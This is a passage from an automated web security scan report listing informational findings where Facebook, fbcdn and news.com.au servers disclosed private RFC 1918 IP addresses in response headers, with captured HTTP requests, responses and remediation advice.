http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.google.com/sdch/StnTz5pY.dct

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

18.1. http://connect.facebook.net/en_GB/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_GB/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.26.115

Request

GET /en_GB/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "4c35bbac3fd4a201402ce67fd8d33280"
X-FB-Server: 10.33.26.115
X-Cnection: close
Content-Length: 133613
Cache-Control: public, max-age=1020
Expires: Wed, 07 Sep 2011 14:34:06 GMT
Date: Wed, 07 Sep 2011 14:17:06 GMT
Connection: close
Vary: Accept-Encoding

/*1315291916,169941619,JIT Construction: v434551,en_GB*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

18.2. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.15.51

Request

GET /safe_image.php?d=AQDe1s_p8lDtl-9c&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fglobal%2Frightcol-attitude.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?height=300&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.themercury.com.au%2F&width=310
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.63.15.51
X-Cnection: close
Content-Length: 7615
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Thu, 08 Sep 2011 14:18:53 GMT
Date: Wed, 07 Sep 2011 14:18:53 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

18.3. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.91.38

Request

GET /safe_image.php?d=AQCOFIMxfITNwtUo&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fuploads%2Fimages%2Fuploads%2Fweddings%2Fwedding.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?height=300&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.themercury.com.au%2F&width=310
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.91.38
X-Cnection: close
Content-Length: 4122
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Thu, 08 Sep 2011 14:15:52 GMT
Date: Wed, 07 Sep 2011 14:15:52 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

18.4. http://media.news.com.au/news/2011/07-jul/business-markets/js/ndm.newscomau.marketstatusservice.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.news.com.au
Path:	/news/2011/07-jul/business-markets/js/ndm.newscomau.marketstatusservice.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.68.203.69

Request

GET /news/2011/07-jul/business-markets/js/ndm.newscomau.marketstatusservice.js HTTP/1.1
Host: media.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=YH7RvubFqqQ-XJ0QeTh

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "300401c533ef80513c42f0125c86ee70:1309923310"
Last-Modified: Wed, 06 Jul 2011 03:35:03 GMT
Accept-Ranges: bytes
Content-Length: 2868
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 14:18:57 GMT
Connection: close

/*global jQuery, ndm */
/*jslint white: true, browser: true, onevar: true, undef: true, nomen: true, eqeqeq: true, plusplus: true, bitwise: true, regexp: true, newcap: true, immed: true, strict: true
...[SNIP]...
,
callbackqueue = [],
status = 'NOTLOADED';

privateObject.fetchdata = function () {
status = 'LOADING';
$.ajax({
//url: 'http://10.68.203.69/workspaces/news_redesign/proof-of-concept/2011/03-business-markets/js/data-market-status.js',
url: 'http://media.news.com.au/news/2011/07-jul/business-markets/js/data-market-status.js'
...[SNIP]...

18.5. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=130375173667364&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2705cbcb4%26origin%3Dhttp%253A%252F%252Fau.news.yahoo.com%252Ff315867968%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F&layout=button_count&locale=en_AU&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=72977
Expires: Thu, 08 Sep 2011 10:34:36 GMT
Date: Wed, 07 Sep 2011 14:18:19 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

18.6. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/Ii1cTFrq_I2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yU/r/Ii1cTFrq_I2.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /rsrc.php/v1/yU/r/Ii1cTFrq_I2.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=135605443134080&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c37855e8%26origin%3Dhttp%253A%252F%252Fwww.themercury.com.au%252Ff217da2fa%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.themercury.com.au%2Farticle%2F2011%2F09%2F07%2F259671_tasmania-news.html&layout=standard&locale=en_GB&node_type=link&sdk=joey&send=true&show_faces=false&width=450
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 02 Sep 2011 19:07:03 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 183337
Vary: Accept-Encoding
Cache-Control: public, max-age=31123437
Expires: Sat, 01 Sep 2012 19:44:02 GMT
Date: Wed, 07 Sep 2011 14:20:05 GMT
Connection: close

/*1314992642,169776067*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fbhRl"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

18.7. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.151.49

Request

Response

18.8. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.163.62

Request

GET /connect/connect.php?id=290190314438&stream=0&connections=10&css= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

18.9. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.186.32

Request

GET /extern/login_status.php?api_key=113758722003364&app_id=113758722003364&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df271172e0c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e4ddb7cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df99f52954%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e4ddb7cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df325f49504%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe2950d24%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e4ddb7cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df325f49504&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f55b203%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e4ddb7cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df325f49504&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a0e8cd38%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e4ddb7cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df325f49504&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.186.32
X-Cnection: close
Date: Wed, 07 Sep 2011 14:19:38 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

18.10. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.24.48

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21e586c4c%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff3e024f7%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df176c53664%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff3e024f7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cc29169c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35f637a04%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff3e024f7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cc29169c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df121f0a53%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff3e024f7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cc29169c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d27bdf58%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff3e024f7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cc29169c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.24.48
X-Cnection: close
Date: Wed, 07 Sep 2011 14:18:14 GMT
Content-Length: 22

Invalid Application ID

18.11. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.166.43

Request

GET /extern/login_status.php?api_key=135605443134080&app_id=135605443134080&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6e1b9ca4%26origin%3Dhttp%253A%252F%252Fwww.themercury.com.au%252Ff217da2fa%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d53a6a8c%26origin%3Dhttp%253A%252F%252Fwww.themercury.com.au%252Ff217da2fa%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33d297008%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c3ae471%26origin%3Dhttp%253A%252F%252Fwww.themercury.com.au%252Ff217da2fa%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33d297008&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d546c3ac%26origin%3Dhttp%253A%252F%252Fwww.themercury.com.au%252Ff217da2fa%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33d297008&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd8817abc%26origin%3Dhttp%253A%252F%252Fwww.themercury.com.au%252Ff217da2fa%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33d297008&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.166.43
X-Cnection: close
Date: Wed, 07 Sep 2011 14:17:08 GMT
Content-Length: 60

Given URL is not permitted by the application configuration.

18.12. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.151.46

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14a86f45%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33d4a10a8%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a1de3c14%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b4b331e%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a1de3c14&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28bba56%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a1de3c14&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df129d02d68%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a1de3c14&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.151.46
X-Cnection: close
Date: Wed, 07 Sep 2011 14:15:26 GMT
Content-Length: 22

Invalid Application ID

18.13. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.171.43

Request

GET /extern/login_status.php?api_key=135447496484311&app_id=135447496484311&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30d5d0a6c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff3e1dd5d08%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10fff7fa%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff3e1dd5d08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a6db61c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df56f025ec%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff3e1dd5d08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a6db61c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c0634c94%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff3e1dd5d08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a6db61c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df318691aa4%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff3e1dd5d08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a6db61c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.43
X-Cnection: close
Date: Wed, 07 Sep 2011 14:18:45 GMT
Content-Length: 250

<script type="text/javascript">
parent.postMessage("cb=f2c0634c94&origin=http\u00253A\u00252F\u00252Fwww.perthnow.com.au\u00252Ff3e1dd5d08&relation=parent&transport=postmessage&frame=f2a6db61c", "http
...[SNIP]...

18.14. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.25.26

Request

Response

18.15. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.65.16.48

Request

GET /plugins/like.php?action=recommend&api_key=113758722003364&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ee108e5c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e4ddb7cc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.perthnow.com.au%2Fbusiness%2Fbusiness-old%2Ffraud-blackmail-in-latest-oswal-claims%2Fstory-e6frg2qu-1226131700884&layout=standard&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

18.16. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.49.57

Request

Response

18.17. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.245.62

Request

GET /plugins/like.php?action=recommend&api_key=135605443134080&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c37855e8%26origin%3Dhttp%253A%252F%252Fwww.themercury.com.au%252Ff217da2fa%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.themercury.com.au%2Farticle%2F2011%2F09%2F07%2F259671_tasmania-news.html&layout=standard&locale=en_GB&node_type=link&sdk=joey&send=true&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
